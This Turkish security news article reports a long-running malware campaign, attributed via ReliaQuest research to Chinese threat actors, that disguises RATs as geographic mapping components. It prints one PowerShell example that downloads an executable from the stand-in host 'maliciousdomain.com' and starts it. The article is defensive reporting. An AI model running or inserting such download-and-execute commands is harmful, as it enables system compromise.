Coğrafi haritalama teknolojisini kullanan karmaşık bir kötü amaçlı yazılım kampanyasının ortaya çıkması, kritik altyapı ve kurumsal ağları yüksek alarm durumuna geçirdi.
İlk olarak Asya ve Kuzey Amerika’daki sektörleri hedef aldığı gözlemlenen kötü amaçlı yazılımın, uzun süreli ağ nüfuzunu sürdürmek için gelişmiş gizlilik taktikleri kullanan bir grup Çinli tehdit aktörüne dayandığı belirlendi.
Saldırganlar, meşru haritalama yardımcı programlarının ve özelleştirilmiş uzaktan erişim Truva Atlarının (RAT’lar) benzersiz bir karışımından yararlanarak, tespitten kaçmalarına ve tehlikeye atılmış ortamlarda yanal hareket için coğrafi verilerden yararlanmalarına olanak tanıdı.
İlk enfeksiyon, truva atı haline getirilmiş belge eklerinin yer aldığı hedef odaklı kimlik avı e-postaları yoluyla gerçekleşti. Kötü amaçlı veri, etkinleştirildikten sonra saldırganın kontrol ettiği sunuculardan haritalama bileşenlerini ve komut modüllerini gizlice indiren komut dosyalarını çalıştırdı.
Enfeksiyon zinciri, genellikle bilinen satıcıları taklit eden dijital sertifikalar kullanarak, kendisini güvenilir yerel hizmetlerin içine yerleştirdi ve böylece temel uç nokta ve ağ savunmalarını engelledi.
Reliaquest araştırmacıları tarafından belgelenen ihlaller, meşru coğrafi bilgi yazılımı güncellemeleri veya eklentileri olarak görünecek şekilde tasarlanmış yüklerle mevcut ağ trafiğine uyum sağlanmasına vurgu yapıldığını ortaya çıkardı.
Reliaquest analistleri, kötü amaçlı yazılımın dikkat çekici uzun ömürlülüğüne dikkat çekti; adli tıp izleri, çeşitli kurban ağlarında on iki aydan fazla kalıcılık gösteriyor.
Müfettişler, saldırganların coğrafi sınırlama tabanlı güvenlik kontrollerinden kaçmasına ve uzun süreler boyunca tespit edilmeden kalmasına yardımcı olan, hedeflenen gözetim ve kaynak haritalamasına olanak tanıyan, saldırganların coğrafi haritalama meta verilerini metodik olarak kullandığını vurguladı.
Gömülü Komut Dosyaları ve Özel RAT Dağıtımı
Kötü amaçlı yazılımın başarısının temelinde esnek enfeksiyon rutini yatıyordu. Tehdit aktörleri, PowerShell ve VBScript kod parçacıklarını Microsoft Office belgelerine yerleştirdi ve açılışta otomatik olarak yürütülmesini sağladı.
Örneğin:-
$payload = Invoke-WebRequest -Uri "http://maliciousdomain.com/geo-component.exe" -OutFile "C:\\temp\\geo.exe"
Start-Process "C:\\temp\\geo.exe"Bu komut dosyası, bir yazılım bileşeni olarak kamufle edilen kötü amaçlı coğrafi haritalama yürütülebilir dosyasını indirir ve başlatır. Kötü amaçlı yazılım, yerleşik hale geldikten sonra zamanlanmış görevler ve kayıt defteri anahtarları aracılığıyla kalıcılık sağladı.
Özel RAT modülleri yerel ağ haritalarına dinamik olarak referans veriyor, keşif işlemlerini gerçekleştiriyor ve C2 altyapısına periyodik işaret veriyor.
.webp)
Buradaki ‘Kötü Amaçlı Yazılım Kalıcılığı İş Akışı’, bu planlanmış görevlerin ve kayıt defteri düzenlemelerinin, tehdidin zaman içindeki varlığını nasıl sabitlediğini, saldırganların sistem yeniden başlatıldıktan ve temel düzeltme çabalarından sonra bile erişimi sürdürmelerini sağladığını gösteriyor.
Güvenlik ekiplerinin anormal planlama rutinlerini ve haritalama yardımcı programlarını içeren ağ trafiğini izlemeleri tavsiye edilir, çünkü bu davranışlar genellikle uzun süreli uzlaşmalardan önce gelir.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
